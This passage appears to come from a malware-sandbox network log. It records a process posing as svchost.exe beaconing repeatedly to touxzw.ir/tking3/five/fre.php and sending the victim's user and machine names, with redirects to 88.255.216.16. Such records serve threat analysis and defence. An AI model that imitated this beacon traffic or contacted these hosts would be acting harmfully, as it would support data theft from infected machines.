Feb 24, 2025 08:40:19.532658100 CET	818	IN	HTTP/1.1 307 Temporary Redirect Date: Mon, 24 Feb 2025 07:40:19 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/tking3/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fF3H8js7PXDWz0cJE8PevvrQ7NbvNlHD%2Fnln403hEM559fqSXG67cmTLvlBJUf9YYA6ShwIIUWmykzdpTmNFrl4ckckbCm9ICjOEt9xCzItNZaWnHTxcj8nXslc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dce8c0e2d18c8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1570&min_rtt=1570&rtt_var=785&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=147&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49734	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:19.686355114 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:19.696594954 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:20.447648048 CET	842	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Feb 2025 07:40:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xZg7pqIwQWYogcefF7suFUJbRwtaT4VDUCbQw0Ud1QD7fasbBfi4QlqueL6qUYBy77%2BQl4L%2B2TLEm8E0KtGcZjgjkQjN6VraKPMj1AxQkTMusTYES%2BbFudM0Dr8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dce91892c726b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1960&min_rtt=1960&rtt_var=980&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49735	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:20.593018055 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:20.599802017 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:21.324126005 CET	826	IN	HTTP/1.1 307 Temporary Redirect Date: Mon, 24 Feb 2025 07:40:21 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/tking3/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i7Pz3XYqpqKjaP6FZ93x8R8uTx%2FvzJFq29%2FhnUDExM5%2B6Pq2cWAmBpg%2FFCYQZK9o5OWsU7r2%2B1D0sEYztbDtFYMOzz0b0ThQQucUTGuDuFG5d5TuzcWl8JWXSks%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dce97381841ec-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1679&min_rtt=1679&rtt_var=839&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49736	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:21.498051882 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:21.503175974 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:22.245167971 CET	822	IN	HTTP/1.1 307 Temporary Redirect Date: Mon, 24 Feb 2025 07:40:22 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/tking3/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J2IBLHJJb3RIt6f9wy4pj42ur%2BJv0t54sjtRoGu7%2B0S69PryfZPfjGYbCnP4V6taA2OF77JQg8mVoHVukQFfgXwUk9p9%2FXhz7oQE3qvYL2DMx63JgonSwc2fQHs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dce9cdd7d41f9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1617&min_rtt=1617&rtt_var=808&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49737	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:22.399348974 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:22.404608011 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:23.122205973 CET	834	IN	HTTP/1.1 307 Temporary Redirect Date: Mon, 24 Feb 2025 07:40:23 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/tking3/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FEx9ocFgPafV0%2FsG%2BxmHus0K9yO0Cww1HnE2baWdxGr1ebTxfpIWpgQVVGHfXmt%2FKSPe8ILfWCO%2FEoce1484X2o2cw%2BtbWlPfoKFTtwYNAKD9g%2Bw7T%2FNHc3QI%2FM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcea28e907cf6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1885&min_rtt=1885&rtt_var=942&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49738	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:23.284168959 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:23.289335012 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:24.055237055 CET	842	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Feb 2025 07:40:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pUfdhFt641dgZrIOmohoB2RBPBfVu8q635RtBdRVEFe91BB9RDbFiLVnt40e9pCstT1t89A%2BklOGv3i8TPMiErE%2B9CUIZ1kXeRhXGBUOz5xCiXQgp%2FrEeWZ81rE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcea8187e32fc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1973&min_rtt=1973&rtt_var=986&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49739	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:24.213011980 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:24.218132973 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:25.001928091 CET	850	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Feb 2025 07:40:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4buGxQilCWmvTzmj0AoZbfL1Fqs%2BVhBGaNnyPzFHvRY%2FTpiGOc%2B00UrN5XhiQD%2FTD56dRea2YJ%2FPo7cNSxDgIT7ih8y53e78BYq5%2FBm7%2FQ4gKbCpjUtUUWBoYBo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dceadebe243fe-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1586&rtt_var=793&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49740	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:25.159491062 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:25.164608002 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:25.918689966 CET	844	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Feb 2025 07:40:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lD3DgYZ%2Fsb2Nmd72hOXnTjUzPYeLNnHDO1qMXLzG%2BuZFecIep0F42RDeuyboPBMZV4dZAPokPUDfw8Mw8wVU39GgyqAQm3e%2BVciYsJgpi9YLAhU%2Bo2Vol6iG2u4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dceb3b8854398-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1562&min_rtt=1562&rtt_var=781&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49741	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:26.083956003 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:26.089206934 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:26.879177094 CET	850	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Feb 2025 07:40:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IxudLRa%2F74g9XxTREPYdFi%2FOH9znTx%2FAc%2FtXsWPNVhV7dHzu1mpy5OoGKDpgmP6LO%2FQ1%2B13qlq3Da2yrDTlIXE8Fs8dBkSw8kQDCESl%2BJDRMfx8AmNnSYymx4FA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dceb99e334396-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1755&min_rtt=1755&rtt_var=877&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49742	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:27.037647963 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:27.042767048 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:27.805233002 CET	827	IN	HTTP/1.1 307 Temporary Redirect Date: Mon, 24 Feb 2025 07:40:27 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/tking3/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7d%2BzIjediKerdGnxjyNrwnK0ZC67J8UWePb4RwXiaCpd6GCf05fvY%2BWIXJM5iXk0t3iL3InaOmrRxWBt0WG3w%2BVx%2FyBMK01q5edT2FXM0IktykU%2BsXamSt34KRA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcebfafc3440e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2020&min_rtt=2020&rtt_var=1010&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49743	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:27.972408056 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:27.977477074 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:28.693880081 CET	822	IN	HTTP/1.1 307 Temporary Redirect Date: Mon, 24 Feb 2025 07:40:28 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/tking3/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iopyqAbPPWgS0akmMjZJ5bwjz3ugQrUbbXjufmPHcC0WgY8EDaVs4YUKmjdHqkyQYXViVH5onyWLKdnHPaJojKi%2FoDMnDVUASomh%2BaQU7Eh%2FEjb2PmTBz9y56uw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcec54e5f7cac-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1828&min_rtt=1828&rtt_var=914&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49744	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:28.855746031 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:28.861062050 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:29.628328085 CET	836	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Feb 2025 07:40:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QoqB8HoxWsjAaulfp3uWQNVXK2uOcvO0ncXWjPi8MS9g1XXy2e9wYIqPcij79RbbHIAdzA1GiDRjdr4qjPoThyxykvgVWznIwVgWcPbi9DCGChqlugxGknBDcDA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcecad864c338-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1477&min_rtt=1477&rtt_var=738&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49746	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:29.812041998 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:29.817332029 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:30.607261896 CET	839	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Feb 2025 07:40:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HyhlrLUUMpLI5DbaDWsjmGO%2BjsKnLqKp3MUkd5HgH8qn5HmW4mDRAprT7FZNNitjgBZZZiYh2jY0fowYgeE68KIomezP63Q6DKyLVAWXVhU4ktjMp3Nf1fKVbi0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dced10be242d1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4303&min_rtt=4303&rtt_var=2151&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49750	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:30.777867079 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:30.783052921 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:31.518030882 CET	824	IN	HTTP/1.1 307 Temporary Redirect Date: Mon, 24 Feb 2025 07:40:31 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/tking3/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yR9uISJUR05C33YMWrHx%2FU1glnOKa4qSX6wWXFwnufpqSrxAqo1LGSzXhojISlApAjNl%2Ftkacavsu6gESy7K8mhTyik41zNCEtF%2F0uFQ6xIfrllT4%2BEs1rZe6D0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dced6e8034308-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1610&min_rtt=1610&rtt_var=805&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49752	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:31.675163984 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
